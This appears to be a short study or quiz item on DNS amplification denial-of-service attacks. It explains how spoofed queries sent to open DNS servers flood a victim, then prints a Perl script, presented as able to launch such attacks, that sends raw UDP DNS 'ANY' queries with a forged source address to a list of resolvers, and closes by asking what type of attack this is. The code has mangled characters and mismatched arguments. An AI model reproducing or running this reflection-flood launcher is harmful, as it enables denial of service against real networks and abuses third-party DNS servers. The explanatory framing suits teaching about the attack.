A Hacker would typically use a botnet to send a large number of queries to open DNS servers. These queries will be “spoofed” to look like they come from the target of the flooding, and the DNS server will reply to that network address.
It is generally possible to stop the more-common bot-delivered attack by blocking traffic from the attacking machines, which are identifiable. But blocking queries from DNS servers brings problems in its wake. A DNS server has a valid role to play in the workings of the Internet. Blocking traffic to a DNS server could also mean blocking legitimate users from sending e-mail or visiting a Web site. A single DNS query could trigger a response that is as much as 73 times larger than the request.
The following perl code can launch these attacks.
use Net::DNS::Resolver;
use Net::RawIP;
open(LIST,”ns.list”);
@list=;
close LIST;
chomp(@list);
my $lnum=@list;
my $i=0;
my $loop=0;
if ($ARGV[0] eq ”) {
print “Usage: ./hackme.pl <loop
count>n”;
exit(0);
}
while($loop < $ARGV[1]) {
while($i < $lnum) {
my $source = $ARGV[0];
my $dnspkt = new Net::DNS::Packet(“google.com”,”ANY”);
my $pktdata = $dnspkt->data;
my $sock = new Net::RawIP({udp=>{}});
?sock->set({ip => { saddr => $source, daddr => $list[$i], frag_off=>0,tos=>0,id=>1565}, udp => {source => 53, dest => 53, data=>$pktdata} });
$sock->send;
$i++;
}$loop++; $i=0;}
exit(0);
What type of attacks are these?